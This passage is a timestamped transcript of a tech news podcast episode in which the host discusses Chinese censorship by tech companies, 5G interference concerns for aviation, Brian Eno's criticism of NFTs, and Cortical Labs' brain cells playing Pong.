have. And if that means the company has to 325 00:20:52,680 --> 00:20:57,119 Speaker 1: engage in a little censorship or perhaps enable a propaganda 326 00:20:57,240 --> 00:21:00,880 Speaker 1: arm of authoritarian regime, well in many cases that's kind 327 00:21:00,880 --> 00:21:03,760 Speaker 1: of waved away as the price of doing business. It's 328 00:21:03,800 --> 00:21:06,320 Speaker 1: never framed that way, by the way, no one would 329 00:21:06,359 --> 00:21:08,159 Speaker 1: ever frame it that way, because that would just be 330 00:21:08,240 --> 00:21:10,920 Speaker 1: a pr nightmare to it to say the quiet part 331 00:21:11,000 --> 00:21:13,720 Speaker 1: out loud. They always frame it in a way where 332 00:21:13,800 --> 00:21:18,080 Speaker 1: they claim that they're giving access to more information. But 333 00:21:18,160 --> 00:21:21,960 Speaker 1: if it's information that only goes through a government filter 334 00:21:22,119 --> 00:21:24,800 Speaker 1: before it gets to people, I don't really buy that 335 00:21:24,960 --> 00:21:29,600 Speaker 1: argument anyway. Considering China's record on stuff like human rights violations, 336 00:21:30,000 --> 00:21:33,000 Speaker 1: this is pretty darn insidious, but it's also not surprising, 337 00:21:33,400 --> 00:21:37,320 Speaker 1: which is incredibly sad. All Right, we have several more 338 00:21:37,400 --> 00:21:40,600 Speaker 1: stories that we need to finish out before we close 339 00:21:40,720 --> 00:21:43,800 Speaker 1: this episode. But before we do that, let's take another 340 00:21:43,880 --> 00:21:54,480 Speaker 1: quick break. Boeing and Airbus have issued warnings that five 341 00:21:54,560 --> 00:21:58,720 Speaker 1: G technology rollouts could create problems for the aviation industry. 342 00:21:59,000 --> 00:22:01,840 Speaker 1: The warning says that five G radio waves could interfere 343 00:22:01,880 --> 00:22:07,160 Speaker 1: with aircraft electronics like radio altimeters. This follows awarding from 344 00:22:07,160 --> 00:22:10,879 Speaker 1: the Federal Aviation Ministration or f a A that also 345 00:22:10,960 --> 00:22:15,040 Speaker 1: said five G interference could cause flight diversions, which obviously 346 00:22:15,200 --> 00:22:18,159 Speaker 1: is a pretty serious problem. Companies like A, T and 347 00:22:18,200 --> 00:22:21,359 Speaker 1: T and Verizon have delayed their activation of five G 348 00:22:21,520 --> 00:22:25,880 Speaker 1: networks while working on this issue, looking to adopt precautionary 349 00:22:25,920 --> 00:22:30,080 Speaker 1: measures to limit five G interference, but Boeing and Airbus 350 00:22:30,200 --> 00:22:33,000 Speaker 1: claim that these proposals don't go far enough, and they 351 00:22:33,040 --> 00:22:35,480 Speaker 1: want to see a commitment to limiting five G so 352 00:22:35,640 --> 00:22:39,320 Speaker 1: that it doesn't operate within range of like forty of 353 00:22:39,359 --> 00:22:43,480 Speaker 1: the world's major airports. The US wireless industry is pushing 354 00:22:43,560 --> 00:22:48,200 Speaker 1: back against this, saying that the aviation industry is distorting 355 00:22:48,200 --> 00:22:51,880 Speaker 1: the truth that they are essentially saying that this problem 356 00:22:51,960 --> 00:22:54,560 Speaker 1: is way worse than any actual problem that might exist, 357 00:22:54,840 --> 00:22:57,760 Speaker 1: and they argue that delays in five G rollouts cause 358 00:22:57,840 --> 00:23:01,000 Speaker 1: harm to the companies and consumers alike. I may have 359 00:23:01,040 --> 00:23:02,959 Speaker 1: to do a full episode about this in the future 360 00:23:03,119 --> 00:23:06,040 Speaker 1: and really look into what's going on at a technical level, 361 00:23:06,080 --> 00:23:10,280 Speaker 1: because I honestly don't know what argument here is. The 362 00:23:10,320 --> 00:23:15,480 Speaker 1: most realistic musician Brian Eno has a pretty skeptical perspective 363 00:23:15,480 --> 00:23:17,639 Speaker 1: on n f T s, which means he and I 364 00:23:17,680 --> 00:23:21,280 Speaker 1: share that in common. Also, I used to record in 365 00:23:21,280 --> 00:23:25,040 Speaker 1: a podcasting studio named after him. All our podcasting studios 366 00:23:25,080 --> 00:23:29,600 Speaker 1: at the office are named after musicians like Eno, Bowie, Prince, 367 00:23:29,640 --> 00:23:33,159 Speaker 1: and York. Anyway, Eno says he feels n f T 368 00:23:33,320 --> 00:23:35,879 Speaker 1: s are being peddled by the equivalent of snake oil 369 00:23:36,000 --> 00:23:40,120 Speaker 1: salespeople and marketed to suckers, hucksters and suckers I think 370 00:23:40,160 --> 00:23:42,119 Speaker 1: is how he put it, which sounds like p T. 371 00:23:42,280 --> 00:23:45,159 Speaker 1: Barnum would be all over the n f T market 372 00:23:45,240 --> 00:23:48,639 Speaker 1: if you are alive today. I happen to agree with 373 00:23:48,800 --> 00:23:52,639 Speaker 1: Eno on this. Should we actually build a metaverse and 374 00:23:52,680 --> 00:23:55,720 Speaker 1: you can listen to yesterday's episode to hear my thoughts 375 00:23:55,760 --> 00:23:59,720 Speaker 1: about that, then n f T S could arguably be 376 00:24:00,080 --> 00:24:02,960 Speaker 1: is full if you wanted to port digital goods from 377 00:24:02,960 --> 00:24:06,840 Speaker 1: one environment into another, though that process would also require 378 00:24:06,880 --> 00:24:09,719 Speaker 1: that a lot of other pieces fall into place, and 379 00:24:09,760 --> 00:24:12,600 Speaker 1: it's by no means a guarantee that it would actually happen. 380 00:24:13,040 --> 00:24:15,240 Speaker 1: But right now, n f t s are really just 381 00:24:15,359 --> 00:24:18,280 Speaker 1: a digital record of a transaction, and you don't actually 382 00:24:18,359 --> 00:24:21,919 Speaker 1: end up owning anything tangible, at least not in the 383 00:24:21,960 --> 00:24:24,720 Speaker 1: sense that we typically think of. I've often said it's 384 00:24:24,800 --> 00:24:27,920 Speaker 1: kind of like buying a star. If you've ever seen 385 00:24:27,920 --> 00:24:31,320 Speaker 1: one of those commercials, you don't really actually own anything, 386 00:24:31,600 --> 00:24:33,639 Speaker 1: and there's no way to say, hey, that's my star, 387 00:24:33,840 --> 00:24:37,040 Speaker 1: so no one else can buy it, Like there's nothing 388 00:24:37,080 --> 00:24:40,320 Speaker 1: stopping some other companies saying, well, we're selling stars, and 389 00:24:40,359 --> 00:24:42,560 Speaker 1: that same star is owned by like eight different people. 390 00:24:43,000 --> 00:24:45,399 Speaker 1: I mean, not that anyone would really care or do 391 00:24:45,440 --> 00:24:48,399 Speaker 1: anything about it. It's just it's it's meaningless, is what 392 00:24:48,440 --> 00:24:51,280 Speaker 1: I'm saying. Anyway, One thing n f T s can 393 00:24:51,320 --> 00:24:54,000 Speaker 1: do is allow fans of an artist or creator a 394 00:24:54,080 --> 00:24:57,200 Speaker 1: chance to support that person's work and show their enthusiasm 395 00:24:57,280 --> 00:25:00,240 Speaker 1: for it. So if an artist works primary le in 396 00:25:00,320 --> 00:25:03,920 Speaker 1: web based media, it can be difficult to monetize that work. 397 00:25:04,320 --> 00:25:06,600 Speaker 1: You might create a Patreon account or something like that, 398 00:25:06,640 --> 00:25:09,600 Speaker 1: But there are fundamental differences between an artist who works 399 00:25:09,640 --> 00:25:12,520 Speaker 1: in the digital realm versus someone who works in a 400 00:25:12,520 --> 00:25:15,000 Speaker 1: physical form of media. N f T s can be 401 00:25:15,160 --> 00:25:18,560 Speaker 1: one way to financially support artists, but that's not really 402 00:25:18,680 --> 00:25:21,200 Speaker 1: how n f t s are marketed. They're pushed more 403 00:25:21,280 --> 00:25:25,840 Speaker 1: as a status symbol or speculative investments, and I feel 404 00:25:25,880 --> 00:25:29,480 Speaker 1: that that's pretty harmful and that that was mostly what 405 00:25:29,720 --> 00:25:32,000 Speaker 1: Eno was getting at. You can read up on what 406 00:25:32,119 --> 00:25:35,840 Speaker 1: he has to say at the Crypto Syllabus website and 407 00:25:35,880 --> 00:25:39,040 Speaker 1: it's under the article Brian Eno on n f T 408 00:25:39,240 --> 00:25:44,200 Speaker 1: s and automaticism. Finally, New Scientists has published an article 409 00:25:44,240 --> 00:25:47,600 Speaker 1: titled human brain cells in a dish learned to play 410 00:25:47,640 --> 00:25:51,919 Speaker 1: Pong faster than an Ai, which is all sorts of 411 00:25:51,920 --> 00:25:55,080 Speaker 1: clickbait for yours. Truly, the headline appears to have been 412 00:25:55,119 --> 00:25:56,960 Speaker 1: engineered in such a way that there's no way I 413 00:25:56,960 --> 00:25:59,800 Speaker 1: could avoid clicking on it. It brings to mind something 414 00:25:59,840 --> 00:26:02,359 Speaker 1: like a Frankenstein film in which a doctor has a 415 00:26:02,359 --> 00:26:04,320 Speaker 1: little bit of brain matter and a dish, and he's 416 00:26:04,440 --> 00:26:07,320 Speaker 1: watching a screen and sees a paddle hit a ball 417 00:26:07,359 --> 00:26:11,600 Speaker 1: on the screen and then proclaim it's alive a love 418 00:26:12,000 --> 00:26:15,120 Speaker 1: But what is actually going on here? All right? Well, 419 00:26:15,160 --> 00:26:20,280 Speaker 1: so some scientists at Cortical Labs took living brain cells, 420 00:26:21,000 --> 00:26:25,280 Speaker 1: incorporated them into a processor, and connected that to a 421 00:26:25,400 --> 00:26:29,879 Speaker 1: quote unquote virtual game world. A large discipline within AI 422 00:26:30,000 --> 00:26:32,320 Speaker 1: and machine learning is the creation of what are called 423 00:26:32,400 --> 00:26:35,879 Speaker 1: artificial neural networks. Well, this is kind of similar, except 424 00:26:35,920 --> 00:26:40,560 Speaker 1: it's using actual neural tissue to serve as neural nodes. 425 00:26:41,320 --> 00:26:43,800 Speaker 1: I would love to tell you more about this, but 426 00:26:43,880 --> 00:26:48,879 Speaker 1: the article is distressingly short on details, and Cortical Labs 427 00:26:48,960 --> 00:26:51,920 Speaker 1: their website gets a bit loosey goosey with their own language. 428 00:26:52,040 --> 00:26:55,040 Speaker 1: For example, from a blog post that was posted just 429 00:26:55,080 --> 00:26:58,240 Speaker 1: a couple of days ago called what does it mean 430 00:26:58,280 --> 00:27:01,879 Speaker 1: to Grow a Mind? The Cortical Lab blog reads up, 431 00:27:02,200 --> 00:27:04,719 Speaker 1: we don't know what we're making because nothing like this 432 00:27:04,760 --> 00:27:08,159 Speaker 1: has ever existed before, an entirely new mode of being, 433 00:27:08,480 --> 00:27:11,959 Speaker 1: a fusion of silicon and neuron, a native to the 434 00:27:12,000 --> 00:27:16,560 Speaker 1: digital world, lit with the Promethean fire of the human mind. 435 00:27:19,359 --> 00:27:24,160 Speaker 1: So they don't really know what they're making. Well, nothing 436 00:27:24,200 --> 00:27:28,640 Speaker 1: could go wrong there, you know. Um, I'll set aside 437 00:27:28,640 --> 00:27:33,840 Speaker 1: my pessimism and skepticism and need to know more and 438 00:27:33,880 --> 00:27:36,640 Speaker 1: just say that bio circuits are fascinating and they come 439 00:27:36,640 --> 00:27:39,320 Speaker 1: complete with their own set of ethical issues to consider, 440 00:27:40,000 --> 00:27:42,240 Speaker 1: but they might also end up being the backbone of 441 00:27:42,280 --> 00:27:46,480 Speaker 1: a new branch of machine learning and AI. And that's 442 00:27:46,520 --> 00:27:49,760 Speaker 1: it for this episode of the Tech News Tech Stuff. 443 00:27:50,440 --> 00:27:53,000 Speaker 1: When we come back later this week, like I said, 444 00:27:53,040 --> 00:27:56,080 Speaker 1: we're going to have some reruns of classic episodes, but 445 00:27:56,160 --> 00:27:58,879 Speaker 1: we'll be back next week with some new ones. And 446 00:27:58,960 --> 00:28:02,040 Speaker 1: I hope every and out there is having a safe, 447 00:28:02,240 --> 00:28:06,439 Speaker 1: healthy and happy holiday season. I know that is incredibly 448 00:28:06,560 --> 00:28:13,439 Speaker 1: challenging considering the the way things work today, but I 449 00:28:13,480 --> 00:28:16,159 Speaker 1: still hope you're all well, and I look forward to 450 00:28:16,200 --> 00:28:24,240 Speaker 1: talking to you again and really soon. Text Stuff is 451 00:28:24,240 --> 00:28:27,439 Speaker 1: an I Heart Radio production. For more podcasts from I 452 00:28:27,520 --> 00:28:31,120 Speaker 1: Heart Radio, visit the I Heart Radio app, Apple Podcasts, 453 00:28:31,240 --> 00:28:33,240 Speaker 1: or wherever you listen to your favorite shows.